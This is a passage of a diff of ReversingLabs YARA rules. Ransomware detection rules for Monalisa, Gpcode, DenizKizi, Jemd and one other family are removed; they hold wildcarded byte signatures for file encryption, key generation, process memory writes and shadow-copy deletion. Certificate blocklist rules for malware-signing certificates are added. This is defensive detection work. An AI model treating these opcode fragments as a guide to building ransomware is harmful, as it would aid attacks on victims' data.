-            25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 FE ?? 09 6F ?? ?? ?? ?? DC 06 2A
-        }
-		$setup_environment = {
-            02 28 ?? ?? ?? ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 02 28 ?? ?? ?? ?? 2A
-        }
-		$init_components = {
-            02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02
-            7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19
-            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ??
-            ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ??
-            ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02
-            7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 22 ?? ?? ?? ?? 22 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 02 17 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            02 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 16 28 ?? ?? ?? ?? 02 28 ?? ??
-            ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $setup_environment ) and ( $init_components )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LCB SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "4b:09:3c:b6:0d:4b:99:22:66:f5:50:93:4a:4a:c7:d0" and 1478649600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Monalisa : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Monalisa ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "34addb63-2426-59a2-b79b-052a9161d361"
-		date = "2022-05-13"
-		modified = "2022-05-13"
+		id = "0db2d42d-bdc3-50bc-b360-a39ccec4df41"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Monalisa.yara#L1-L83"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0bcb79dff111ec05ac93bbe9a777546bd6234dc60d9f6982c03cd0bc3b26b038"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13386-L13402"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "74749317fcefcdb698046a6f42c6c6e05cc1eab1370b3b1fd7d025f49de4a032"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Monalisa"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 A1 ?? ?? ?? ?? 33
-            C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B CC 89 65
-            ?? 8D 45 ?? B3 ?? 51 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 33 C0 6A
-            ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 E8 ?? ?? ?? ??
-            83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8A D3 88 5D ?? 8B CE E8 ?? ??
-            ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
-        }
-		$write_proc_mem = {
-            8D 45 ?? 50 FF 76 ?? 8B 46 ?? 03 C7 50 8B 06 03 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 3E 0F B7 41 ?? 48 3B D8 75 ?? 8B 51 ??
-            EB ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 56 ?? 8B 4E ?? 2B D7 8B C1 25 ??
-            ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ??
-            ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ??
-            ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 85 C9
-            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 48 C1 8D 4D ?? 51 50 8B 45 ?? 52 03 C7 50 FF 75 ??
-            FF 15
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 50
-            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ??
-            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 51 0F 43 05 ?? ?? ?? ?? 50 6A ?? 68 ??
-            ?? ?? ?? 51 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 05 ?? ?? ?? ?? ?? ?? ??
-            ?? 0F 10 00 0F 11 05 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 05 ?? ?? ?? ?? C7 40 ?? ??
-            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 89 08 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ??
-            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64
-            89 0D ?? ?? ?? ?? 59 8B E5 5D C3
-        }
-		$generate_key = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 75 ??
-            8B 0C 88 A1 ?? ?? ?? ?? 3B 81 ?? ?? ?? ?? 7F ?? 56 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 45 ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $write_proc_mem ) and ( $generate_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "20:50:b5:41:46:b0:11:ed:30:f6:0f:61" and 1476773926 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gpcode : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Gpcode ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "168833dd-44ab-59e1-a610-b9219b2907ff"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "284c206f-8a0c-5bb6-8f28-d8e5e60efe3e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Gpcode.yara#L1-L67"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "329309873977f73a8ebe758018ebc8ba42e15c3c7cbb9a65865631d235f5bb48"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13404-L13420"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "503429e737e8bdad735cf88e2bb2877d1f52b2c38be101a7a129c02db608a347"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GPCode"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drive_loop = {
-            B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80
-            C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D
-        }
-		$encrypt_routine = {
-            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10]
-            E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ??
-            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15)
-            ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
-            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ??
-            75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8
-        }
-		$set_ransom_wallpaper = {
-             0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ??
-             B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F
-             59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33
-             C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-             ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-             68 ?? ?? ?? ?? (E8 | FF 15)
-        }
-		$read_config_file = {
-            55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ??
-            E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF
-            75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
-            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
-            89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04
-            33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75
-            ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ??
-            6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B
-            45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ??
-            ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $drive_loop and $encrypt_routine and $set_ransom_wallpaper and $read_config_file )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "73:e2:f3:4c:9c:24:35:f2:9b:be:0a:3c" and 1480312984 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Denizkizi : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DenizKizi ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e16a00d6-d5b8-5702-9cd7-d037b0ff46a3"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "a8ed2e72-d94e-5141-8ceb-181459a729ad"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DenizKizi.yara#L1-L88"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fbeb01263d6f68141e094ba8fb1c1a54c601ab24292f5c6b0eb8cb0c49f46afc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13422-L13438"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3eb63f75f258eec611fa4288302f0ce5e47149ca876265a4a4b65dc33313aaa6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DenizKizi"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
-            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ??
-            ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 0D ?? ??
-            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 8B 10 FF 12 52 50 8B 45 ?? 8B 10 FF 52 ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 50 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 8B 10 FF 52 ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 50
-            8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$delete_shadow_copies = {
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B
-            E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $delete_shadow_copies )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "68:c4:57:d7:49:5d:2a:8d:0d:7b:90:42:83:61:35:c2" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jemd : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Jemd ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef981ffa-8801-50f0-9441-5f2bfcf44133"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "e1cf9568-9a6a-58cb-81a4-25063ccc1ac7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Jemd.yara#L1-L105"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "552e0fc118031e953dee2e7c6bf8234a5a90de8c34b0e2724dfe99f2b28b8c51"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13440-L13456"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b20c16dafcd891c36b28b36093cd3ad3a15f3795f0f2adda61fb0db2835d02d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Jemd"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 33 DB 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 75
